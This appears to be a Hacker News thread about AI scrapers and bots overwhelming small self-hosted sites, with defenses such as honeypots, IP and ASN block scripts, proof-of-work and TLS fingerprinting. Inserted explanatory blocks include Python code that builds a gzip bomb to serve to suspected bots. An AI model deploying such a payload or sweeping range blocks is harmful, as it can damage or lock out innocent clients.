| opposed to getting around to actually writing a tool to block
| it.
| esseph wrote:
| You'd end up blocking a bunch of cloud provider IP ranges
| and one day in the near future, there's a good chance some
| SaaS or provider service doesn't work.
| aledalgrande wrote:
| For your use case have you thought about VPN into your local
| network, via e.g. a Synology box? It's pretty cool and easy
| to set up.
| UltraSane wrote:
| The public internet is an incredibly hostile infosec environment
| and you pretty much HAVE to block requests based on real time
| threat data like https://www.misp-project.org/feeds/
|
| It is fun to create honeypots for things like SSH and RDP and
| automatically block the source IPs
| fragmede wrote:
| The Internet is _not_ safe, and Let's Encrypt shows us this.
| They're a great service, but the moment you put something on
| the Internet and then give it an SSL/TLS certificate, evil will
| hammer your site trying to find a WordPress admin page.
| _the_inflator wrote:
| I can confirm.
|
| My then PageRank 6 business website got attacked non-stop
| starting around 2008.
|
| At this time my log files exploded as well: the Script Kiddies
| entered the arena.
|
| At the time the first tools leaked into the public to scan for
| IP ranges and check websites for certain attack vectors.
|
| I miss the era between Compuserve, AOL around 1995 till 2008.
|
| Web Rings, Technorati, fantastic Fan Sites before Wikipedia -
| wholesome.
|
| Term: Script Kiddies
| https://en.wikipedia.org/wiki/Script_kiddie
| esseph wrote:
| By 1995 most of the script kiddies I knew were also co-
| mingling with 0day authors and warez distributors.
| quaintdev wrote:
| I do not have a solution for a blog like this, but if you are self
| hosting I recommend enabling mTLS on your reverse proxy.
|
| I'm doing this for a dozen services hosted at home. The reverse
| proxy just drops the request if the user does not present a
| certificate. My devices which can present cert can connect
| seamlessly. It's a one time setup but once done you can forget
| about it.
| SoftTalker wrote:
| That's fine if you're hosting stuff just for yourself but not
| really practical if you're hosting stuff you want others to be
| able to read, such as a blog.
| lukevp wrote:
| You can mTLS to CloudFlare too, if you're not one of the
| anti-CloudFlare people. Then all traffic drops besides
| traffic that passes thru CF and the mTLS handshake prevents
| bypassing CF.
| BehindTheMath wrote:
| You don't need mTLS for that. Just block all IPs beside for
| Cloudflare's ranges.
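That filter is a few lines with Python's `ipaddress` module. The two ranges below are illustrative only; a real deployment should load the current list that Cloudflare publishes:

```python
import ipaddress

# Illustrative allow-list; in practice, fetch the published ranges
# from Cloudflare's IP list rather than hardcoding them.
ALLOWED_RANGES = [
    ipaddress.ip_network("173.245.48.0/20"),
    ipaddress.ip_network("103.21.244.0/22"),
]

def is_allowed(client_ip: str) -> bool:
    """Return True if the connecting IP falls inside an allowed range."""
    ip = ipaddress.ip_address(client_ip)
    return any(ip in net for net in ALLOWED_RANGES)
```

In production you'd enforce this at the firewall rather than in application code, but the membership test is the same.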
| bogwog wrote:
| Wireguard is much better. Not only is it easier to set
| up/maintain, it even works on Android and iOS. I used to use
| client authentication for my private git server, but getting
| client certs installed on every client browser or app was a
| pain in the ass, and not even possible for some mobile
| browsers.
|
| Today, my entire network of self hosted stuff exists in a
| personal wireguard VPN. My firewall blocks everything except
| the wireguard port (even SSH).
| cyp0633 wrote:
| My Gitea instance also encountered aggressive scraping some days
| ago, but with highly distributed IP & ASN & geolocation, each of
| which is well below the rate of a human visitor. I assume Anubis
| will not stop the massively funded AI companies, so I'm
| considering poisoning the scrapers with garbage code, only
| targeting blind scrapers, of course.
| mrweasel wrote:
| Sadly we're now seeing services that sell proxy access,
| allowing you to scrape from a wide variety of residential IPs;
| some even go so far as to label their IPs as "ethically
| sourced".
| skopje wrote:
| sad but hosting static content like his site in a cloud would
| save him a headache. i know i know, "do it yourself" and all but
| if that is his path he knows the price. maybe i am wrong and do
| not understand the problem but it seems like he is asking for a
| headache.
|
| edit: words
| Nifty3929 wrote:
| I think the author would agree, and is in fact the point of his
| post.
|
| The only way to solve these problems is using some large hosted
| platform where they have the resources to constantly be
| managing these issues. This would solve their problem.
|
| But isn't it sad that we can't host our own websites anymore,
| like many of us used to? It was never easy, but it's nearly
| impossible now and this is only one reason.
| skopje wrote:
| i think it has been hard to host a site since about 2007. i
| stopped then because it is too much work to keep it safe.
| even worse now but it has always been extra work since search
| engines. maybe the OP is just getting older and wants to
| spend time with his kids and not play with nginx haha.
| zdc1 wrote:
| I wonder if you can have a chain of "invisible" links on your
| site that a normal person wouldn't see or click. The links can go
| page A -> page B -> page C, where a request for C = instant IP
| ban.
| chrisweekly wrote:
| IP addresses from scrapers are innumerable and in constant
| rotation.
| SkiFire13 wrote:
| Scrapers nowadays can use residential and mobile IPs, so
| banning by IP, even if actual malicious requests are coming
| from them, can also prevent actual unrelated people from
| accessing your service.
| SoftTalker wrote:
| Unless you're running a very popular service, unlikely that a
| random residential IP would be both compromised by a
| malicious VPN and also trying to access your site
| legitimately.
| arbol wrote:
| Lots of people have chrome extensions installed that use
| their connection like a proxy, so this is more common than you
| think
| SoftTalker wrote:
| Can you provide any examples of these extensions? I'm not
| doubting you, just curious.
| arbol wrote:
| There's one mentioned here:
| https://www.bleepingcomputer.com/news/security/data-
| stealing...
|
| Anyone who owns a chrome extension with 50k+ installs is
| regularly asked to sell it to people (myself included).
| The people who buy the extensions try to monetize them
| any way they can, like proxying traffic for malicious
| scrapers / attacks.
| esseph wrote:
| Botnets are massive these days.
|
| Also a lot of big companies are paying for residential
| "proxies" to scrape traffic from for AI.
| theoreticalmal wrote:
| How can a scraper get a mobile IP address?
| arbol wrote:
| Just one of many offering this service
| https://brightdata.com/proxy-types/mobile-proxies
| Habgdnv wrote:
| I self host and I have something like this but more obvious: i
| wrote a web service that talks to my mikrotik via API and adds
| the IP of the requester to the block list with a 30 day timeout
| (configurable ofc). Its hostname is "bot-ban-
| me.myexamplesite.com" and it is like a normal site in my
| reverse proxy. So when I request a cert this hostname is in the
| cert, and in the first few minutes i can catch lots of bad
| apples. I do not expect anyone to ever type this. I do not
| mention the address or anything anywhere, so the only way to
| land there is to watch the CT logs.
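The trap itself can be sketched without the MikroTik specifics. The hostname and 30-day timeout below mirror the description above; the in-memory dict is a stand-in for the router's address list, which a real version would update over the API:

```python
import time

TRAP_HOST = "bot-ban-me.example.com"  # hostname that appears only in the cert
BAN_SECONDS = 30 * 24 * 3600          # 30-day timeout, as described above
blocklist: dict[str, float] = {}      # ip -> ban expiry timestamp

def handle_request(client_ip: str, host_header: str) -> int:
    """Ban any client that requests the trap hostname; otherwise serve."""
    now = time.time()
    if blocklist.get(client_ip, 0) > now:
        return 403  # already banned
    if host_header == TRAP_HOST:
        # A real setup would push this entry to the firewall instead.
        blocklist[client_ip] = now + BAN_SECONDS
        return 403
    return 200
```

Since the hostname is never published anywhere, anything that requests it must have harvested it from the CT logs.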
| trescenzi wrote:
| There was an article just yesterday which detailed doing this
| not in order to ban, but in order to waste time. You can also
| zip bomb people which is entertaining but probably not super
| effective.
|
| https://herman.bearblog.dev/messing-with-bots/
|
| https://news.ycombinator.com/item?id=45935729
| wibbily wrote:
| I do something like this. Every page gets an invisible link to
| a honeypot. Click the link, 48hr ban.
|
| Honestly I have no idea how well it works, my logs are still
| full of bots. *Slow* bots, though. As long as they're not
| ddosing me I guess it's fine?
| SoftTalker wrote:
| We do something similar for ssh. If a remote connection tries
| to log in as "root" or "admin" or any number of other usernames
| that indicate a probe for vulnerable configurations, that's an
| insta-ban for that IP address (banned not only for SSH but for
| everything).
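A rough sketch of that check as a log scanner. The username list and log line format are illustrative (real sshd messages vary by distro and version); the point is just to extract IPs that probed for default accounts:

```python
import re

# Illustrative set of usernames that indicate a probe, not a real user.
PROBE_USERS = {"root", "admin", "test", "oracle", "ubuntu"}

# Matches sshd-style "Invalid user NAME from IP" and
# "Failed password for NAME from IP" lines (format is an assumption).
LINE_RE = re.compile(r"(?:Invalid user|Failed password for) (\S+) from (\S+)")

def ips_to_ban(log_lines):
    """Return the set of IPs that tried to log in as a probe username."""
    banned = set()
    for line in log_lines:
        m = LINE_RE.search(line)
        if m and m.group(1) in PROBE_USERS:
            banned.add(m.group(2))
    return banned
```

Feeding the result into a firewall drop rule gives the "insta-ban for everything" behavior described above.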
| sequoia wrote:
| I don't know if there's a simple solution to deploy this but JA3
| fingerprinting is sometimes used to identify similar _clients_
| even if they're spread across IPs:
| https://engineering.salesforce.com/tls-fingerprinting-with-j...
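Per the linked write-up, a JA3 fingerprint is just an MD5 over five comma-separated fields pulled from the TLS ClientHello, each field a dash-joined list of decimal values. A sketch of the hashing step only (capturing and parsing the ClientHello is the hard part, and is omitted here):

```python
import hashlib

def ja3_hash(tls_version, ciphers, extensions, curves, point_formats):
    """Compute a JA3 fingerprint: MD5 of
    'version,ciphers,extensions,curves,pointformats',
    where each list is joined with dashes."""
    fields = [str(tls_version)] + [
        "-".join(str(v) for v in part)
        for part in (ciphers, extensions, curves, point_formats)
    ]
    ja3_string = ",".join(fields)
    return hashlib.md5(ja3_string.encode()).hexdigest()
```

Because the hash is deterministic over the ClientHello parameters, two clients built on the same TLS stack produce the same JA3 even from different IPs, which is what makes it useful here.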
| arbol wrote:
| You need to terminate the TLS connection yourself, so this
| rules out using a DNS proxy, e.g. Cloudflare. Then you
| have to run a server that has a module that computes the
| ja3/ja4, e.g. nginx. Even then, it's possible to set your
| client hello in python/curl/etc. to exactly mirror the JA4 of
| your chosen browser, like Chrome. So ja4 stops basic bots, but
| most seasoned scrapers already implement valid ja4s/ja3s.
| petermcneeley wrote:
| The real internet has yet to be invented.
| zkmon wrote:
| Common man never had a need for internet or global connectedness.
| DARPA wanted to push technology to gain upper hand in the world
| matters. Universities pushed technology to show progress and sell
| research. Businesses pushed technologies to have more sales. It
| was kind of acid rain that was caused by the establishments and
| sold as scented rain.
| wartywhoa23 wrote:
| This sentiment - along the lines of "the world became too
| dependent on the Internet", "Internet wasn't a good thing to
| begin with", "Internet is a threat to national security" etc -
| has been popping up on HN too often lately, emerged too
| abruptly and correlates with the recent initiatives to crack
| down on the Internet too well.
|
| If this is your own opinion and not a part of a psyop to
| condition people into embracing the death of the Internet as we
| know it, do you have any solution to propose?
| gchamonlive wrote:
| You don't need to have a solution to explore a problem in my
| opinion. OP comment is problematic but for reasons other than
| not having a proposed solution.
| gchamonlive wrote:
| > Common man never had a need for internet or global
| connectedness
|
| That's not how culture evolves. You don't necessarily need to
| have a problem so that a solution is developed. You can very
| well have a technology developed for other purposes, or just
| for exploration sake, and then as this tech exists uses for it
| start to pop post hoc.
|
| You therefore ignore the immense benefit of access to
| information that technology has, something that wasn't
| necessarily a problem for the common man but once its there,
| the popularization of the access to information, they adapt and
| grow dependent on it. Just like electricity.
| zkmon wrote:
| >>immense benefits ??
|
| People with dialup telephones never asked for a smartphone
| connected to internet. They were just as happy back then or
| even more happy because phone didn't eat off their time or
| cause posture problems.
|
| Sure, shopping was slower without the Amazon website, but it
| was no less happy an experience back then. In fact, homes had
| less junk and people saved more money.
|
| Messaging? sure it makes you spend time with 100 whatsapp
| groups, where 99% of the people don't know you personally.
|
| It helped companies to sell more of the junk more quickly.
|
| It created bloggers and content creators who lived in an
| imaginary world thinking that someone really consumes their
| content.
|
| It created karma beggars who begged globally for likes that
| are worth nothing.
|
| It created more concentration of wealth at some weird
| internet companies, which don't solve any of the world
| problems or basic needs of the people.
|
| And finally it created AI that pumps plastic sewage to fill
| the internet. There it is, your immensely useful internet.
|
| As if the plastic pollution was not enough in the real world,
| the internet will be filled with plastic content.
|
| What else did internet give that is immensely helpful?
| wartywhoa23 wrote:
| You're blaming the hammer for people driving nails into
| others' heads instead of walls.
|
| A friend of mine, who had a similar opinion on technology,
| once watched a movie that seemed to reinforce it in his
| eyes, and tried to persuade me as if it was the ultimate
| proof that all technology is evil.
|
| The plot depicted a happy small tribe of indigenous people
| deep in the rainforest, who never ever saw any artifacts of
| civilization. They never knew war, homicide, or theft.
| Basically, they knew no evil. Then, one day, a plane flies
| over and someone frivolously tosses an emptied bottle of
| Coca-Cola out of the window (sic!). A member of the tribe
| finds it in the forest and brings back to the village. And,
| naturally, everyone else wants to get hold of the bottle,
| because it's so supernatural and attractive. But the guy
| decides he's the only owner, refuses and then of course
| kills those who try to get it by force, and all hell breaks
| loose in no time.
|
| "See", - concludes my friend triumphally, - "the technology
| brought evil into this innocent tribe!"
|
| "But don't you think that evil already lurked in those
| people to start with, if they were ready to kill each other
| for shiny things?" - I asked, quite baffled.
|
| "Oh, come on, so you're just supporting this shit!" was the
| answer...
| zkmon wrote:
| You didn't actually refute any of the examples I gave.
| Show me the benefits of internet which helped equal
| sharing of the resources of this planet. Show me how
| internet did not help concentration of power and wealth.
| Show me how people's attention span and physical spaces
| are not filled by junk thanks to internet.
| wartywhoa23 wrote:
| Why refute the examples based on the false premise that
| it's the medium's fault that it's filled with plastic
| bullshit (which I totally agree with, mind you)?
|
| What's next, blaming electromagnetic field and devices to
| modulate it for beeing full of propaganda, violence and
| all kinds of filth the humankind is capable of creating?
| You find what you seek, and if not, keep turning that
| damn knob further.
|
| But since you insist, some good frequencies to tune into:
|
| 1) Self-education in whatever field of practical or
| theoretical knowledge you're interested in;
|
| 2) Seeing a wider picture of the world than your local
| authorities would like you to (yes, basically seeing that
| all the world's kings are naked, which is the #1 reason
| why the Internet became such a major pain in the ass for
| the kings' trade union, so to say);
|
| 3) Being able to work from any location in the world with
| access to the Internet;
|
| 4) You mentioned selling trash en masse worldwide, but I
| know enough examples of wonderful things produced by
| independent people and sold worldwide.
|
| The list could be longer, but I hate doing useless and
| thankless work.
| zkmon wrote:
| Thanks for providing some positive examples. But these
| examples are dwarfed by the negative effects brought in
| by internet, in my view. Sure, a modulated signal can be
| used for broadcasting weather report or some propaganda.
| But the rush to push technology was done mostly by not
| talking about the negative effects. Same is happening
| with AI. Sales prospects are the positive benefits
| driving it. No one wants to say that the tiger which they
| are bringing back to life, because they can, is an enemy
| of humans.
| wartywhoa23 wrote:
| I do agree with you that the negative aspects have been
| overwhelming any remaining good for quite some time, and
| that's a constant source of mourning for good things
| which keep succumbing to evil in this world for me.
| xedrac wrote:
| I run a dedicated firewall/dns box with netfilter rules to rate
| limit new connections per IP. It looks like I may need to change
| that to rate limit per /16 subnet...
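In iptables terms that is roughly the `hashlimit` match with `--hashlimit-srcmask 16`. The aggregation logic itself can be sketched in Python (function names are illustrative):

```python
from collections import Counter
import ipaddress

def subnet_counts(ips, prefix=16):
    """Count connections per /prefix subnet instead of per individual IP."""
    counts = Counter()
    for ip in ips:
        # strict=False masks the host bits, e.g. 47.79.1.1 -> 47.79.0.0/16
        net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
        counts[str(net)] += 1
    return counts

def over_limit(ips, limit, prefix=16):
    """Return the subnets whose connection count exceeds the limit."""
    return {net for net, n in subnet_counts(ips, prefix).items() if n > limit}
```

Grouping by /16 catches the common pattern where a scraper rotates through adjacent addresses in one provider's block, each individually under the per-IP limit.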
| bo1024 wrote:
| I wonder if a proof of work protocol is a viable solution. To GET
| the page, you have to spend enough electricity to solve a puzzle.
| The question is whether the threshold could be low enough for
| typical people on their phones to access the site easily, but
| high enough that mass scraping is significantly reduced.
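A minimal hashcash-style sketch of the idea: the server hands out a challenge, the client burns CPU finding a nonce, and verification costs the server a single hash. The `difficulty_bits` knob is exactly the threshold question raised above:

```python
import hashlib
import itertools

def solve(challenge: str, difficulty_bits: int) -> int:
    """Client side: find a nonce such that sha256(challenge || nonce)
    starts with difficulty_bits zero bits. Expected cost ~2^difficulty_bits."""
    target = 1 << (256 - difficulty_bits)
    for nonce in itertools.count():
        digest = hashlib.sha256(f"{challenge}{nonce}".encode()).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce

def verify(challenge: str, nonce: int, difficulty_bits: int) -> bool:
    """Server side: one hash, so verification is nearly free."""
    digest = hashlib.sha256(f"{challenge}{nonce}".encode()).digest()
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))
```

Real deployments (Anubis is one example) deliver the challenge via JavaScript and store the solved token in a cookie, so legitimate visitors pay once per session while naive mass scrapers pay on every request.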
| kalavan wrote:
| There's this paper from 2004: "Proof-of-Work Proves Not to
| Work": https://www.cl.cam.ac.uk/~rnc1/proofwork.pdf
|
| The conclusion back then was that it's impossible to make a
| threshold that is both low enough and high enough.
|
| You need some other mechanism that can distinguish bad traffic
| from good (even if imperfectly), and then adjust the threshold
| based on it. See, for instance, "Proof of Work can Work":
| https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/lu...
| bo1024 wrote:
| Thanks for these references! I imagine the numbers would be
| entirely different in our context (20 years later and web
| serving, not email sending). And the idea of spammers using
| bot nets (therefore not paying for compute themselves) would
| be less relevant to LLM scraping. But I'll try to check for
| forward references on these.
| kalavan wrote:
| > And the idea of spammers using bot nets (therefore not
| paying for computer themselves) would be less relevant to
| LLM scraping.
|
| It's possible that the services that reward users for
| running proxies (or are bundled with mobile apps with a
| notice buried in the license) would also start
| rewarding/hiding compute services as well. There's
| currently no money in it because proof-of-work is so rare,
| but if it changes, their strategy might too.
| beeflet wrote:
| Good links, but this is just for email and relies on some
| (admittedly) pretty lofty assumptions
| tonyhart7 wrote:
| I'm sorry but it literally doesn't work, as the other commenter
| cited,
|
| because if you make the requirement like that, it basically
| cancels out the other effect.
| IshKebab wrote:
| I feel like it _could_ work. If you think about it, you need
| the cost to the client to be greater than the cost to the
| server. As long as that is true, the server shouldn't mind
| increased traffic because it's making a profit!
|
| Very crudely if you think that a request costs the server ~10ms
| of compute time and a phone is 30x slower then you'd need 300ms
| of client compute time to equal it which seems very reasonable.
|
| The only problem is you would need a cryptocurrency that a)
| lets you verify tiny chunks of work, and b) can't be done
| faster than you can do it on a phone using other hardware, and
| c) lets a client mine money without being able to actually
| spend it ("homomorphic mining"?).
|
| I don't know if anything like that exists but it would be an
| interesting problem to solve.
| beeflet wrote:
| The problem is that the attacker isn't using a phone, they
| are using some type of specialized hardware.
|
| I still think it is possible with some customized variant of
| RandomX. The server could even make a bit of money by acting
| as a mining pool by forcing the clients to mine a certain
| block template. It's just that it would need to be installed
| as a browser plugin or something, it wouldn't be efficient
| running within a page.
|
| Also the verification process for RandomX is still pretty
| intensive, so there is a high minimum bar for where it would
| be feasible.
| smileson2 wrote:
| It's probably just time for the web page to die
| zelphirkalt wrote:
| What do you mean by that? Web pages are the central mechanism
| we use to put information on the web. Of course many websites
| are shitty and could convey their information much more
| simply, without looking like crap at all. But the web page in
| general? Why would we ever get rid of something so useful? And
| what do you suggest as an alternative?
| ksenzee wrote:
| ...they said, on a web page.
| cosmicgadget wrote:
| > Other things I've noticed is increased traffic with Referer
| headers coming from strange websites such as bioware.com,
| mcdonalds.com, and microsoft.com
|
| I've been seeing this too, I guess scrapers think they can get
| through some blockers with a referrer?
| ModernMech wrote:
| The Internet was a scene, and like all scenes it's done now
| that the corpos have moved in and taken over (because at that
| point it's just ads and rent extraction in perpetuity). I dunno
| what/where/when the next tech scene will be, but I do know it's
| _not_ going to come from Big Tech. See: Metaverse.
| jcalvinowens wrote:
| Scrapers have constantly been running against my cgit server for
| the past year, but they're bizarrely polite in my case... 2-3
| requests per minute.
|
| This whole enterprise is clearly run by exceptionally dumb
| people, since you can just clone all the code I host there
| directly from upstreams...
| [16/Nov/2025:16:21:12 +0000] 190.92.214.144:34638 . "GET /cgit/li
| nux/commit/drivers/vlynq?h=v5.15.76&id=59d42cd43c7335a3a8081fd6ee
| 54ea41b0c239be HTTP/1.1" -> 200 3051b 3.42x 0.239ms
| [16/Nov/2025:16:22:15 +0000] 188.239.57.1:40328 . "GET /cgit/linu
| x/commit/kernel/range.c?h=v6.12.31&id=459b37d423104f00e87d1934821
| bc8739979d0e4 HTTP/1.1" -> 200 2993b 3.42x 0.266ms
| [16/Nov/2025:16:22:56 +0000] 190.92.217.125:56580 . "GET /cgit/li
| nux/commit/kernel?h=v5.15.92&id=f01aefe374d32c4bb1e5fd1e9f931cf77
| fca621a HTTP/1.1" -> 200 3091b 3.28x 0.250ms
| [16/Nov/2025:16:23:17 +0000] 159.138.10.64:44540 . "GET /cgit/lin
| ux/commit/drivers/mtd/mtdcore.c?h=v6.2.15&id=249858575fd3f27904d6
| bb775e5ab500e9ef3b0f HTTP/1.1" -> 200 3415b 3.47x 0.251ms
| [16/Nov/2025:16:23:58 +0000] 119.13.101.228:44342 . "GET /cgit/li
| nux/commit/drivers/gpio?h=v6.6.93&id=bc7fe1a879fc024942bb9eff173f
| a619b722d09b HTTP/1.1" -> 200 3582b 3.37x 0.250ms
| firefoxd wrote:
| I have been using zipbombs and they were effective to some
| extent. Then I had the smart idea to write about it on HN [0].
| The result was a flood of new types of bots that overwhelmed my
| $6 server. For ~100k daily requests, it wasn't sustainable to
| serve 1 to 10MB payloads.
|
| I've updated my heuristic to only serve the worst offenders, and
| created honeypots to collect IPs and respond with 403s. After a
| few months, and some other spam tricks I'll keep to myself this
| time, my traffic is back to something reasonable again.
|
| [0]: https://news.ycombinator.com/item?id=43826798
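For reference, the classic construction is to pre-compress a long run of zeros and serve it with `Content-Encoding: gzip`: the payload stays tiny on the wire but inflates enormously in the client. A sketch (sizes illustrative):

```python
import gzip
import io

def make_gzip_bomb(uncompressed_mb: int) -> bytes:
    """Build a gzip payload that inflates to uncompressed_mb megabytes
    of zeros. Serve it once with 'Content-Encoding: gzip' to a client
    you have already classified as hostile."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb") as gz:
        chunk = b"\x00" * (1024 * 1024)  # 1 MiB of zeros compresses ~1000:1
        for _ in range(uncompressed_mb):
            gz.write(chunk)
    return buf.getvalue()
```

As the comment above notes, the catch is bandwidth: even a "small" 1-10 MB compressed payload adds up fast at ~100k requests a day, which is why targeting only the worst offenders matters.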
| tetris11 wrote:
| There's likely a large market for this kind of thing. Maybe
| time to spin out a side business and deploy your heuristics to
| struggling IPs.
|
| Though I have to admit I dont know who your target audience
| would be. Self-hosting orgs don't tend to be flush with cash
| AaronAPU wrote:
| Everything good enough to become popular gets swarmed by the
| teeming masses and then exploited and destroyed.
|
| The only solution seems to be to constantly abandon those things
| and move on to new frontiers to enjoy until the cycle repeats.
| svara wrote:
| The Internet has really been an interesting case study for what
| happens between people when you remove a varying number of layers
| of social control.
|
| All the way back to the early days of Usenet really.
|
| I would hate to see it but at the same time I feel like the
| incentives created by the bad actors really push this towards a
| much more centralized model over time, e.g. one where all traffic
| provenance must be signed and identified and must flow through a
| few big networks that enforce laws around that.
| Cosi1125 wrote:
| "Socialists"* argue for more regulations; "liberals" claim that
| there should be financial incentives to not do that.
|
| I'm neither. I believe that we should go back to being
| "tribes"/communities. At least it's a time-tested way to -
| maybe not prevent, but somewhat alleviate - the tragedy of the
| commons.
|
| (I'm aware that this is a very poor and naive theory; I'll
| happily ditch it for a better idea.)
|
| --
|
| *) For the lack of a better word.
| thrance wrote:
| What would prevent attacks between "tribes"? What would
| prevent one from taking over the others and sending us back
| to square one?
| Cosi1125 wrote:
| Little would prevent attacks by APTs and other powerful
| groups. (This, btw., is one of the few facets of this
| problem that technology could help solve.) But a trivial
| change: a hard requirement to sign up (=send a human-
| composed message to one of the moderators) to be able to
| participate (or, in extreme cases, to read the contents)
| "automagically" stops almost all spam, scrapers (in the
| extreme case), vandalism, etc. (from my personal experience
| based on a rather large sample).
|
| I think it's one of the multi-faceted problems where
| technology (a "moat", "palisade", etc. for your "tribe")
| should accompany social changes.
| erickhill wrote:
| I very much relate to the author's sour mood and frustration. I
| also host a small hobby forum and have experienced the same
| attacks constantly, and it has gotten especially bad the last
| couple of years with the rise of AI.
|
| In the early days I put Google Analytics on the site so I could
| observe traffic trends. Then, we were all forced to start adding
| certificates to our sites to keep them "safe".
|
| While I think we're all doomed to continue that annual practice
| or get blocked by browsers, I have often considered removing
| Google Analytics. Ever since their redesign it is essentially
| unusable for me now. What benefit does it bring if I can't
| understand the product anymore?
|
| Last year, in a fit of desperation, I added Cloudflare. This has
| a brute force "under attack" mode that seems to stop all bots
| from accessing the site. It puts up a silly "hang on a second,
| are you human" page before the site loads, but it does seem to
| work. Is it great UX? No, but at least the site isn't getting
| hammered by various locations in Asia. Cloudflare also let me
| block entire countries, although that seems to be easily fooled.
|
| I also don't think a lot of the bots/AI crawlers honor the rules
| set in the robots.txt. It's all an honor system anyway, and they
| are completely lacking in it.
|
| There need to be some hard and fast rules put in place, somehow,
| to stop the madness.
| timpera wrote:
| Cloudflare does work, but it often destroys the experience for
| legitimate users. On the website I manage, non-technical users
| were often getting stuck on the Cloudflare captcha, so I ended
| up removing it.
|
| Then there's also the issue of dependence on US-based services,
| but that may not be an issue for you.
| mrb wrote:
| Unpopular opinion: the real source of the problem is not
| scrapers, but your unoptimized web software. Gitea and Fail2ban
| are resource hogs in your case, either unoptimized or poorly
| configured.
|
| My tiny personal web servers can withstand thousands of requests
| per second, barely breaking a sweat. As a result, none of the
| bots or scrapers cause any issues.
|
| _" The only thing that had immediate effect was sudo iptables -I
| INPUT -s 47.79.0.0/16 -j DROP"_ Well, by blocking an entire /16
| range, it is this type of overzealous action that contributes to
| making the internet experience a bit more mediocre. This is the
| same thinking that lead me to, for example, not being able to
| browse homedepot.com from Europe. I am long-term traveling in
| Europe and like to frequent DIY websites with people posting
| links to homedepot, but no someone at HD decided that European
| IPs couldn't access their site, so I and millions of others are
| locked out. The /16 is an Alibaba AS, and you make the assumption
| that most of it is malicious, but in reality you don't know. Fix
| your software, don't blindly block.
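| A sketch of the "fix your software" approach: per-IP rate
| limiting in nginx in front of the Gitea instance the article
| describes (Gitea listens on port 3000 by default; the server_name
| and the limits here are illustrative assumptions to adjust):

```nginx
# Per-IP rate limiting: degrade abusive clients instead of
# blackholing whole /16 ranges. Values here are illustrative.
limit_req_zone $binary_remote_addr zone=perip:10m rate=5r/s;

server {
    listen 443 ssl;
    server_name git.example.org;                # hypothetical name

    location / {
        limit_req zone=perip burst=20 nodelay;  # excess requests get 429
        limit_req_status 429;
        proxy_pass http://127.0.0.1:3000;       # Gitea's default port
    }
}
```

| This keeps legitimate users and well-behaved crawlers working
| while starving the scrapers that hammer hundreds of requests per
| second from a single address.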
| skybrian wrote:
| Isn't this problem why Cloudflare is popular? You can write your
| own server, but outsource protecting it from bots.
|
| Perhaps there are better alternatives?
| foo-bar-bat wrote:
| When was the internet ever a safe haven, and from what exactly?
| eimrine wrote:
| From governments, of course. There were times when criticism of
| anything and everything was a common and safe practice online.
| There are very few places where it is possible to keep
| practicing this now.
| m3047 wrote:
| Upvoted not because the internet has ever been a safe haven, but
| for simply taking a moment to document the issue. But then again,
| I can't even give away a feed of what's bouncing off of my walls,
| drowning in my moat.
|
| (An Alibaba /16? I block not just 3/8, but every AWS range I can
| find.)
| zokier wrote:
| fyi aws have been publishing (since 2014) all their IP ranges
| in simple json format https://aws.amazon.com/blogs/aws/aws-ip-
| ranges-json/
|
| I'd hope other major clouds would do the same
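| The feed lives at https://ip-ranges.amazonaws.com/ip-ranges.json,
| and each entry carries an ip_prefix, region, and service field. A
| self-contained sketch of parsing that format (a small inline
| sample stands in for the real feed so the example needs no
| network access):

```shell
# Write a tiny sample in the same shape as AWS's ip-ranges.json.
cat > /tmp/ip-ranges-sample.json <<'EOF'
{"syncToken": "1700000000",
 "prefixes": [
   {"ip_prefix": "3.5.140.0/22", "region": "ap-northeast-2", "service": "EC2"},
   {"ip_prefix": "52.94.76.0/22", "region": "us-west-2", "service": "AMAZON"}]}
EOF

# Pull out every EC2 prefix using only the python3 stdlib (no jq needed).
python3 - <<'EOF'
import json
with open("/tmp/ip-ranges-sample.json") as f:
    data = json.load(f)
for p in data["prefixes"]:
    if p["service"] == "EC2":
        print(p["ip_prefix"])   # prints 3.5.140.0/22 for the sample above
EOF
```

| Against the real feed, swap the sample file for a curl of the URL
| above; the prefixes can then be dropped into an iptables chain or
| an ipset.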
| A1kmm wrote:
| It might be easier to block by ASN rather than hard-coding IP
| ranges. Something as simple as this in cron every 24 hours will
| help (adjust the ASNs in the bzgrep to your taste - and couple
| with occasional persistence so you don't get hit every reboot):
|
|       TEMPDIR=$(mktemp -d)
|       trap 'rm -r "$TEMPDIR"' EXIT
|       curl https://archive.routeviews.org/oix-route-views/oix-full-snap... -Lo "$TEMPDIR/snapshot.bz2"
|       bzgrep -e " (15828|213035|400377|399471|210654|46573|211252|62904|135542|132372|36352|209641|7552|36352|12876|53667|138608|150393|60781|138607) i" "$TEMPDIR/snapshot.bz2" \
|           | cut -d" " -f 3 | sort | uniq > "$TEMPDIR/badranges"
|       iptables -N BAD_AS || true
|       iptables -D INPUT -j BAD_AS || true
|       iptables -A INPUT -j BAD_AS
|       iptables -F BAD_AS
|       for ROUTE in $(cat "$TEMPDIR/badranges"); do
|           iptables -A BAD_AS -s "$ROUTE" -j DROP
|       done
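| With a routeviews-sized snapshot that loop can create thousands
| of individual iptables rules, each checked in sequence. A
| firewall-config sketch of the same idea using ipset instead (one
| hash:net set consulted by a single rule; assumes the badranges
| file produced by a script like the one above, and needs root to
| apply):

```shell
# Build/refresh a set of bad networks; -exist makes the calls idempotent.
ipset create bad_as hash:net -exist
ipset flush bad_as
while read -r ROUTE; do
    ipset add bad_as "$ROUTE" -exist
done < "$TEMPDIR/badranges"

# One rule consults the whole set (insert it only if it isn't there yet).
iptables -C INPUT -m set --match-set bad_as src -j DROP 2>/dev/null \
    || iptables -I INPUT -m set --match-set bad_as src -j DROP
```

| Set lookups are hash-based, so match cost stays flat no matter
| how many routes land on the blocklist.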
| miyuru wrote:
| If anyone wants the 2000s internet experience for a while, I
| recommend deploying a website on IPv6-only server.
|
| It will be accessible to only about 50% of the internet, but back
| then not many people had internet anyway.
| k0tan32 wrote:
| Some HNers already mentioned that the internet has not been a
| safe haven for a long time. All these vulnerability scanners and
| parsers were pinging my servers even back in the mid-2000s. It
| has just become worse, and even OSS projects and usually
| captcha-free places are installing things like Anubis [1].
|
| All of this reminds me of some of Gibson's short stories I read
| recently and his description of Cyberspace: small corporate
| islands of protected networks in a hostile sea of sapient AIs
| ready to burn your brain.
|
| Luckily, LLMs are not there yet, although you can still get your
